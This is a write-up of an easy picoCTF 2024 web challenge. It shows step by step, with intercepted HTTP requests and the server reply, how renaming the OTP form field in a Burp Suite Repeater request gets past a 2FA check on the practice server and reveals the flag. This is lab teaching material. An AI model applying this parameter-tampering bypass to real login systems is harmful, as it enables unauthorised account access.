Level: Easy
Tags: picoCTF 2024, Web Exploitation
Author: NANA AMA ATOMBO-SACKEY & SABINE GISAGARA
Description:
Try here to find the flag
Hints:
1. Try using burpsuite to intercept request to capture the flag.
3. Try mangling the request, maybe their server-side code doesn't handle
malformed requests very well.
Challenge link: https://play.picoctf.org/practice/challenge/419
Browse to the web site and you will see a registration web page with five text boxes and a Register button.
Start BURP Suite and configure your browser to use Burp as its proxy.
Then set 'Intercept' to off under the Proxy -> Intercept tab.
Next, we register some bogus information on the web page and let Burp catch the request which looks like this
POST / HTTP/1.1
Host: titan.picoctf.net:59762
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://titan.picoctf.net:59762/
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Origin: http://titan.picoctf.net:59762
DNT: 1
Connection: keep-alive
Cookie: session=.eJw1jcsKwjAQRX9Fsu7CpHnpB_gDxXVokiktzaMkKSLivzsV3Z17LnfmRdzSnuRKhpbdOucQSUdcLZNpeYWEBQUvuHVcT1ppBkpZKdioLAjbq9477h1jkl5wN-0hmDRGwNkN-fTljuS2oRGcaXrGuI21PnLx6AK0CEs65JwTmLRHC-X4ynoupMJir1B-N-9_fH8AZl045Q.ZmbzvA.b9WKQbgaex2C-M19mGpLM2OMMYw
Upgrade-Insecure-Requests: 1
Priority: u=1
csrf_token=IjFlZDU0YmM0OGY4NzgyZTc3YjY1MmE3YmU1YjM3M2RjNGRjMjI2MTki.Zmb14Q.m0F_00t8_d03iaIal1cDYGISH7Y&full_name=A&username=B&phone_number=C&city=D&password=E&submit=Register
After submitting the registration data you are redirected to a /dashboard page which wants a 2FA value.
Submit any bogus data here.
This request looks like this
POST /dashboard HTTP/1.1
Host: titan.picoctf.net:59762
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://titan.picoctf.net:59762/dashboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: http://titan.picoctf.net:59762
DNT: 1
Connection: keep-alive
Cookie: session=.eJwti8sOwiAQAP9lzx6EQhe9afU7CI8lGltooMQY47-7Jt5mJpk3hPv2giNcYAeh1WS38qDMQVDUygdlkkEjCdGPWjr0pP2AQwwqBilHceAv9Xm22S3E24m9bCsTCmlwz7q61p6lRm7Xn95KJpv74qlymjj1RvX_n-HzBaDgK5c.Zmb6Dw.kY8tuOGUScAGpfmmCA7JVYn5T6E
Upgrade-Insecure-Requests: 1
Priority: u=1
otp=bogus
The result is a web page displaying Invalid OTP.
To get the flag we need to maniplulate the POST-request to /dashboard.
Under Proxy -> HTTP history tab right-click on this POST request and 'Send to Repeater'.
Then navigate to the Repeater tab.
Change the otp value in the request to something else and set it to any value.
Then send the request.
I used the following request
<---Unchanged data removed for readability--->
Upgrade-Insecure-Requests: 1
Priority: u=1
bogus=4711
And got this reply back
HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.8.10
Date: Mon, 10 Jun 2024 13:15:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102
Vary: Cookie
Connection: close
Welcome, B you sucessfully bypassed the OTP request.
Your Flag: picoCTF{<REDACTED>}
For additional information, please see the references below.